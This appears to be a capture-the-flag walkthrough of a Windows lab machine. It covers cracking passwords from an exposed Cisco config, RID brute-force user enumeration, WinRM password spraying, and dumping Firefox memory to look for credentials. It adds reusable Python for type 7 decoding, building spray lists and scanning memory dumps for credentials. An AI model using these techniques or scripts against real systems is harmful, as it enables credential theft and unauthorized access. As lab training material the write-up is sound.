Proof of Concept

10.129.96.157

Nmap

PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
5985/tcp open  wsman

Information Gathering

Collecting host information

┌──(kali㉿kali)-[~/Heist]
└─$ nxc smb 10.129.96.157 --generate-hosts-file hosts
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
 
┌──(kali㉿kali)-[~/Heist]
└─$ cat hosts
10.129.96.157     SUPPORTDESK.SupportDesk SUPPORTDESK

Configuring /etc/hosts

┌──(kali㉿kali)-[~/Heist]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.96.157     SUPPORTDESK.SupportDesk SUPPORTDESK

Initial Access

The web service on port 80 presents a login page; clicking the "Login as guest" button redirects to /Issues.php

On /issues.php the user "Hazard" appears, and the Attachment link points to http://10.129.96.157/attachments/config.txt, a Cisco IOS configuration that contains a type 5 (md5crypt) enable secret and two type 7 (reversibly obfuscated) user passwords:

  • enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
  • username rout3r password 7 0242114B0E143F015F5D1E161713
  • username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

Cracking the type 5 hash (md5crypt, hashcat mode 500) recovers the plaintext stealth1agent

$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent

Decoding the Cisco type 7 passwords (a fixed-key XOR, reversible without any cracking) yields the plaintexts

0242114B0E143F015F5D1E161713:$uperP@ssword
02375012182C1A1D751618034F36415408:Q4)sJu\Y8qz*A3?d
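Type 7 needs no wordlist because the whole scheme is a two-digit decimal seed followed by the plaintext XORed byte-by-byte against a fixed 53-byte key, starting at the seed offset. The following Python is an added example, not code from the original writeup: it decodes and re-encodes type 7 strings, pulls every "username ... password 7" line out of an IOS config, and separates out the "enable secret 5" md5crypt hash, which is not reversible and has to go to hashcat -m 500. The sample config is the config.txt content shown above; the function names are my own.

```python
import re

# Cisco's fixed type 7 XOR key; public since the 1990s, which is why "password 7"
# is obfuscation rather than encryption.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Sample taken from the config.txt lines shown above.
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

_TYPE7_RE = re.compile(r"^\d{2}(?:[0-9A-Fa-f]{2})+$")
_USER_RE = re.compile(r"^username (\S+)(?: privilege \d+)? password 7 ([0-9A-Fa-f]+)\s*$", re.M)
_SECRET5_RE = re.compile(r"^enable secret 5 (\$1\$\S+)\s*$", re.M)


def decode_type7(encoded: str) -> str:
    """Reverse a 'password 7' string.

    Layout: two decimal digits = starting offset into TYPE7_KEY (IOS uses 0-15),
    then one hex byte per plaintext character, each XORed with the key byte at
    (offset + index) mod len(TYPE7_KEY).
    """
    if not _TYPE7_RE.match(encoded):
        raise ValueError(f"not a type 7 string: {encoded!r}")
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")  # garbage input raises here, which is what you want


def encode_type7(plaintext: str, seed: int = 2) -> str:
    """Forward direction, useful to confirm a decode or to craft test vectors."""
    if not 0 <= seed <= 15:
        raise ValueError("IOS only emits seeds 0-15")
    data = plaintext.encode("ascii")
    enc = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return f"{seed:02d}{enc.hex().upper()}"


def extract_credentials(config: str) -> dict[str, str]:
    """username -> decoded password for every 'password 7' line in an IOS config."""
    return {user: decode_type7(enc) for user, enc in _USER_RE.findall(config)}


def extract_type5_hashes(config: str) -> list[str]:
    """'enable secret 5' values are md5crypt ($1$...), not reversible: feed them
    to hashcat -m 500 instead of trying to decode them."""
    return _SECRET5_RE.findall(config)


if __name__ == "__main__":
    for user, pw in extract_credentials(SAMPLE_CONFIG).items():
        print(f"{user}: {pw}")
    for h in extract_type5_hashes(SAMPLE_CONFIG):
        print(f"type 5 (crack offline, hashcat -m 500): {h}")
```

Run it directly to print both user passwords from the embedded sample, or import it and call extract_credentials() on any config file you pull off a share or a web server.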

SMB authentication succeeds as hazard:stealth1agent

┌──(kali㉿kali)-[~/Heist]
└─$ nxc smb 10.129.96.157 -u 'hazard' -p 'stealth1agent'
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent

Enumerating users on the target (RID brute force over the lsarpc pipe with the hazard credentials)

┌──(kali㉿kali)-[~/Heist]
└─$ impacket-lookupsid 'hazard:stealth1agent@10.129.96.157' -target-ip 10.129.96.157
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
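The listing mixes real accounts with a group ("None", RID 513) and accounts that Windows ships disabled; spraying those only burns attempts against a lockout threshold and fills the event log. The following Python is an added example, not part of the original writeup: it parses impacket-lookupsid output into records and produces the spray list that nxc -u expects, keeping SidTypeUser entries only and dropping the well-known disabled accounts by default. The sample input is the lookupsid output above; the function names and the disabled-account set are my own.

```python
import re

# One entry line of impacket-lookupsid output, e.g.
#   1012: SUPPORTDESK\Chase (SidTypeUser)
_ENTRY_RE = re.compile(r"^(?P<rid>\d+): (?P<domain>[^\\]+)\\(?P<name>.+?) \((?P<kind>SidType\w+)\)$")

# Well-known local accounts that Windows 10 / Server 2019 ships disabled.
DISABLED_BY_DEFAULT = {"Guest", "DefaultAccount", "WDAGUtilityAccount"}

# The lookupsid output captured above.
SAMPLE_OUTPUT = r"""
[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
"""


def parse_lookupsid(output: str) -> list[dict]:
    """Turn the RID listing into records; the [*] status lines are skipped."""
    entries = []
    for line in output.splitlines():
        m = _ENTRY_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["rid"] = int(rec["rid"])
            entries.append(rec)
    return entries


def spray_targets(output: str, skip_disabled: bool = True) -> list[str]:
    """Accounts worth a spray attempt.

    Groups and aliases (SidTypeGroup / SidTypeAlias) can never authenticate, and
    accounts disabled by default almost never do; every attempt against them is
    wasted against the lockout threshold and adds noise to the target's logs.
    """
    names = {
        e["name"]
        for e in parse_lookupsid(output)
        if e["kind"] == "SidTypeUser"
        and not (skip_disabled and e["name"] in DISABLED_BY_DEFAULT)
    }
    return sorted(names, key=str.lower)


if __name__ == "__main__":
    # Redirect to userlist.txt and feed it to: nxc winrm <ip> -u userlist.txt -p password.txt
    print("\n".join(spray_targets(SAMPLE_OUTPUT)))
```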

Spraying the recovered passwords over the enumerated users via WinRM: only Chase:Q4)sJu\Y8qz*A3?d authenticates

┌──(kali㉿kali)-[~/Heist]
└─$ nxc winrm 10.129.96.157 -u userlist.txt -p password.txt
WINRM       10.129.96.157   5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Administrator:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Guest:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\DefaultAccount:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\None:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\DefaultAccount:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\None:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)

WinRM authentication confirmed as Chase:Q4)sJu\Y8qz*A3?d

┌──(kali㉿kali)-[~/Heist]
└─$ nxc winrm 10.129.96.157 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
WINRM       10.129.96.157   5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
WINRM       10.129.96.157   5985   SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)

Connecting over WinRM as Chase

┌──(kali㉿kali)-[~/Heist]
└─$ evil-winrm -i 10.129.96.157 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents>

Read user.txt

*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
c5ff5802e2c15da94759bd9c6adb06c8
*Evil-WinRM* PS C:\Users\Chase\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::166
   IPv6 Address. . . . . . . . . . . : dead:beef::4512:c4cf:3d03:7bd0
   Link-local IPv6 Address . . . . . : fe80::4512:c4cf:3d03:7bd0%15
   IPv4 Address. . . . . . . . . . . : 10.129.96.157
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%15
                                       10.129.0.1

Privilege Escalation

todo.txt found in C:\Users\Chase\Desktop

*Evil-WinRM* PS C:\Users\Chase\Desktop> dir
 
 
    Directory: C:\Users\Chase\Desktop
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        2/26/2026   8:06 PM             34 user.txt
 
 
*Evil-WinRM* PS C:\Users\Chase\Desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
 
Done:
1. Restricted access for guest user.

winPEAS enumeration finds a Firefox profile database (key4.db) under Chase's AppData

<SNIP>
 
==================== Browsers Information ====================
 
==== Showing saved credentials for Firefox
    Info: if no credentials were listed, you might need to close the browser and try again.
 
==== Looking for Firefox DBs
    https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
    Firefox credentials file exists at C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\key4.db
    Run SharpWeb (https://github.com/djhohnstein/SharpWeb)
 
<SNIP>

Firefox is running (five firefox processes, PIDs 748, 6580, 6692, 6836 and 7100)

*Evil-WinRM* PS C:\Users\Chase\Documents> ps
 
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    473      18     2352       5456               368   0 csrss
    290      13     1968       5036               480   1 csrss
    357      15     3484      14392              4368   1 ctfmon
    254      14     3960      13200              3724   0 dllhost
    166       9     1876       9676       0.05   6932   1 dllhost
    617      32    29372      58256               968   1 dwm
   1496      57    23744      77956              4244   1 explorer
    355      25    16472      39112       0.16    748   1 firefox
   1071      69   140560     217932       7.70   6580   1 firefox
    347      19    10268      36636       0.19   6692   1 firefox
    401      33    31476      91480       0.86   6836   1 firefox
    378      28    22024      58908       0.47   7100   1 firefox
     49       6     1512       3864               784   0 fontdrvhost
     49       6     1796       4632               792   1 fontdrvhost
<SNIP>

Dumping the memory of a firefox process with ProcDump (-ma writes a full memory dump). PID 748 is used here; Firefox is multi-process, so if one dump does not contain what you are looking for, dump the remaining firefox PIDs from the ps listing as well.

*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump64.exe -accepteula -ma 748 firefoxdump
 
ProcDump v11.1 - Sysinternals process dump utility
Copyright (C) 2009-2025 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
 
[22:05:29]Dump 1 info: Available space: 3693731840
[22:05:29]Dump 1 initiated: C:\Users\Chase\Documents\firefoxdump.dmp
[22:05:29]Dump 1 writing: Estimated dump file size is 298 MB.
[22:05:29]Dump 1 complete: 298 MB written in 0.4 seconds
[22:05:30]Dump count reached.
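Once the dump has been transferred back to the attacking machine, the usual next step is strings plus grep for credential-looking material. The following Python is an added example, not code from the original writeup: it runs the same search over a raw dump file in both ASCII and UTF-16LE (Windows processes keep many strings as UTF-16, which a plain ASCII strings pass misses), looks for form and query-string parameter names that usually carry a secret, percent-decodes the value, and reports the byte offset. The parameter-name list and function names are my own, and the embedded sample bytes are constructed for the demonstration, not data from the target.

```python
import re
import sys
from urllib.parse import unquote

# Parameter names that usually carry a secret in a query string or form body.
SECRET_NAMES = ("password", "passwd", "pwd", "secret", "token")

# name=value as it appears in URLs and x-www-form-urlencoded bodies. The value is
# printable ASCII without whitespace, '&' or quotes, so it stops where the pair ends.
_PAIR_RE = re.compile(
    r"([A-Za-z0-9_.\[\]-]*(?:" + "|".join(SECRET_NAMES) + r")[A-Za-z0-9_.\[\]-]*)"
    r"=([!#$%(-~]{1,128})",
    re.IGNORECASE,
)

# Constructed sample "dump": an ASCII request fragment with a decoy username,
# a UTF-16LE cookie fragment, and some binary noise. Not data from the target.
SAMPLE_DUMP = (
    b"\x00\x00\x13\x37GET /login.php?login_username=helpdesk%40example.test"
    b"&login_password=N0t%40Real%21&login= HTTP/1.1\r\n\x00\x00"
    + "theme=dark; ".encode("utf-16-le")
    + "Cookie: pwd=Constructed-Secret\x00".encode("utf-16-le")
    + b"\xff\xfe\x00\x01"
)


def _scan_text(text: str, encoding: str, scale: int, shift: int) -> list[dict]:
    """Run the pair regex over a decoded view and map matches back to byte offsets."""
    return [
        {
            "encoding": encoding,
            "offset": m.start() * scale + shift,
            "name": m.group(1),
            # unquote, not unquote_plus: a literal '+' in a password must survive
            "value": unquote(m.group(2)),
        }
        for m in _PAIR_RE.finditer(text)
    ]


def find_credentials(data: bytes) -> list[dict]:
    """Credential-looking name=value pairs in a raw memory image.

    ASCII is searched through a lossless latin-1 view; UTF-16LE is searched twice
    (even and odd byte alignment) because a wide string can start at any offset.
    """
    hits = _scan_text(data.decode("latin-1"), "ascii", 1, 0)
    for shift in (0, 1):
        view = data[shift:].decode("utf-16-le", errors="replace")
        hits += _scan_text(view, "utf-16le", 2, shift)
    seen, unique = set(), []
    for h in hits:  # the same pair usually appears many times in a dump
        key = (h["name"].lower(), h["value"])
        if key not in seen:
            seen.add(key)
            unique.append(h)
    return unique


def scan_dump(path: str) -> list[dict]:
    """A whole-file read is fine for a few hundred MB; chunk with overlap beyond that."""
    with open(path, "rb") as fh:
        return find_credentials(fh.read())


if __name__ == "__main__":
    hits = scan_dump(sys.argv[1]) if len(sys.argv) > 1 else find_credentials(SAMPLE_DUMP)
    for h in hits:
        print(f"{h['encoding']:8} @0x{h['offset']:08x} {h['name']}={h['value']}")
```

Run it as `python3 scan_dump.py firefoxdump.dmp` against the real dump, or with no argument to see it pick the password out of the constructed sample while ignoring the username field.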